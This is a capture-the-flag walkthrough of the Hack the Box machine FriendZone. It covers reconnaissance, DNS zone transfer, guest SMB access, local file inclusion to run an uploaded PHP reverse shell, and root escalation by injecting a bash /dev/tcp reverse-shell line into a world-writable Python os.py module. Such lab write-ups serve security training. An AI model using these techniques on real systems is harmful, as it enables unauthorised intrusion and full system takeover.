3 min read

Hack the Box - FriendZone

Hi there, this is FriendZone machine walkthrough. An easy box but so much fun from this box.


  • OS: Linux
  • IP:
  • Difficulty: Easy


Let's start with nmap xD.

$ nmap -sV -sC -A -Pn
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-06 23:14 KST
Nmap scan report for
Host is up (0.30s latency).
Not shown: 993 closed ports
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_  256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
53/tcp  open  domain
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE,; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -0s, deviation: 0s, median: -0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2019-06-06T17:14:52+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script results:
| clock-skew: 
|_  -0s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.41 seconds

The most interested services to me were:

  1. FTP Server was running but username and password required.
  2. HTTP and HTTPS were running too xD
  3. This server was also used as DNS Server with doamin friendzone.red.
  4. Samba file server was running and also allow for guest user xD

Check HTTP and HTTPS port

For I found this

FriendZone web

But for was a Not Found page of Apache.

However there was a email on the page info@friendzoneportal.red. From the result of NMAP scan and this email address, I thought the server had 2 domains, friendzone.red and friendzoneportal.red. So, I added these to my /etc/hosts file. friendzone.red friendzoneportal.red

Now open the webiste again using this domain. The HTTP pages showed the same result, but I tried HTTPS and found these.


FriendZone web


FriendZone web

Page source code didn't have any intesting hint. There were only that 2 GIF images.

Check for sub domains

I used dig command to check if any sub domains existed (because port 53 was opened) and yeahh, it existed xD

$ dig axfr friendzone.red @                                                                                                     
; <<>> DiG 9.10.6 <<>> axfr friendzone.red @
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A
administrator1.friendzone.red. 604800 IN A
hr.friendzone.red.	604800	IN	A
uploads.friendzone.red.	604800	IN	A
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 377 msec
;; WHEN: Thu Jun 06 23:25:01 KST 2019
;; XFR size: 8 records (messages 1, bytes 261)
$ dig axfr friendzoneportal.red @
; <<>> DiG 9.10.6 <<>> axfr friendzoneportal.red @
;; global options: +cmd
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.	604800	IN	AAAA	::1
friendzoneportal.red.	604800	IN	NS	localhost.
friendzoneportal.red.	604800	IN	A
admin.friendzoneportal.red. 604800 IN	A
files.friendzoneportal.red. 604800 IN	A
imports.friendzoneportal.red. 604800 IN	A
vpn.friendzoneportal.red. 604800 IN	A
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 511 msec
;; WHEN: Thu Jun 06 23:25:25 KST 2019
;; XFR size: 9 records (messages 1, bytes 281)

I added those domains in A record to my /etc/hosts file. administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red admin.friendzoneportal.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.red

Access to web page via domain name

There were 2 admin domains:

  • administrator1.friendzone.red


  • admin.friendzoneportal.red


I tried do some SQL Injection but it didn't working and the page admin.friendzoneportal.red showed a message that "Admin page is not developed yet !!! check for another one". So I thought only the first domain will work.

Let check SMB server

As the result from NMAP Scan that the SMB was running and allow guest user, so I tried to connect to that file server as guest user.

SMB Login

![SMB folder](htb-friendzone-7.png

There were 3 volumes but after tried to mount, only 2 were able to mount.

SMB Development Folder

Lol, I found some php shell files here. It was such a hint from other player xD. I checked for the folder permission and it was read/write access.

And in general volume I found a creds.txt file which was a credential for admin.

SMB general folder

creds for the admin THING:

Check admin webpage again xD

I used this credential to login to https://administrator1.friendzone.red and it showed a message like this.

Login Done ! visit /dashboard.php

So, now check https://administrator1.friendzone.red/dashboard.php

FriendZone admin

The beginner php developer of this page told us to add some params to the url to show the image. Haha, let's try...


FriendZone admin

I have looked around and nothing found. I only could change the image name a.jpg and b.jpg. But what is that param pagename???

As I found some php shell files inside shared folder Development, I thought that it must be a Local File Inclusion to the param pagename. So we have to know the real path of the shared volumne Development on the server.

NMAP with SMB enum shared script

I searched google for smb enum and I found smb-enum-shared script for NMAP. So, I started do nmap again.

$ nmap --script smb-enum-shares -p139
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-07 16:45 KST
Nmap scan report for friendzone.red (
Host is up (0.49s latency).
139/tcp open  netbios-ssn

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   Development: 
|     Comment: FriendZone Samba Server Files
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   Files: 
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   IPC$: 
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   general: 
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 92.14 seconds

I could see that Development shared volumne was stored on path /etc/Development.

Get access to the machine

Now I created a reverse shell file named a.php and copied to that shared volumne. I started running my netcat listener for that reverse shell and tried to execute reverse shell using filename param on admin website.

My a.php file should be at /etc/Development/a.php. By using Local File Inclusion technique, I opened it as


I didn't use extension .php because the sample of pagename=timestamp.

And my reverse shell listener

$ netcat -lvnp 1234
Connection from
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 17:37:35 up 34 min,  0 users,  load average: 2.85, 4.84, 5.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls /home
$ cd /home/friend
$ ls
$ cat user.txt
$ python -c "import pty;pty.spawn('/bin/bash')"

In /var/www/ I found mysql_data.conf file which was the user and password of database.

www-data@FriendZone:/home/friend$ cd /var/www
www-data@FriendZone:/var/www$ ls
admin	    friendzoneportal	   html		    uploads
friendzone  friendzoneportaladmin  mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend




So, I tried ssh to the machine using that password.

$ ssh friend@                                                           Chhaileng@Chhailengs-MacBook-Pro
friend@'s password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have mail.
Last login: Fri Jun  7 10:34:26 2019 from

And I got the fully interactive TTY shell.


After got a shell on the box, I uploaded pspy64 to the box and excuted the binary. And this is what I noticed.


Script reporter.py was run by root. I kept tracking that process and saw that script was run by cron every a few minutes. This is what inside the reporter.py script. Most lines of code were commented, but there was a import os line which import library from python 2.7.

friend@FriendZone:/opt/server_admin$ cat reporter.py

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''


# I need to edit the script later
# Sam ~ python developer

I went to library directory which is /usr/lib/python2.7. The interested thing was that python2.7 directory was allowed with full permission.

friend@FriendZone:/usr/lib$ ls -la | grep python2
drwxrwxrwx 27 root root  16384 Jun 26 14:27 python2.7

Also the file os.py.

friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx  1 root     root      25876 Jun 26 14:32 os.py

Since the reporter.py was always run by root and call os python module, I injected some code to execute the reverse shell in os.py at the end.

system("bash -c 'bash -i &>/dev/tcp/ 0<&1'")

I also ran the netcat listener for this reverse shell and wait for cronjob execute the script.

And I got a root shell.

$ nc -lvnp 1234
Connection from
bash: cannot set terminal process group (3435): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:~# ls  
root@FriendZone:~# cat root.txt

Rooted, and I hope you enjoy this xD